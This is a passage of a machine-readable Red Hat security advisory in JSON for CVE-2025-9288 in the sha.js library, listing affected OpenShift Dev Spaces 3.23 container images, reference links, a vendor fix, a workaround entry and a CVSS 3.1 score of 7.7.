          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2025-9288"
        },
        {
          "category": "external",
          "summary": "RHBZ#2389980",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2389980"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-9288",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9288"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9288"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/sha.js/pull/78",
          "url": "https://github.com/browserify/sha.js/pull/78"
        },
        {
          "category": "external",
          "summary": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5",
          "url": "https://github.com/browserify/sha.js/security/advisories/GHSA-95m3-7q98-8xr5"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2025-9287",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9287"
        }
      ],
      "release_date": "2025-08-20T21:59:44.728000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2025-09-15T16:27:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant to your system have been applied. For details on how to apply this update, refer to: https://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2025:15847"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
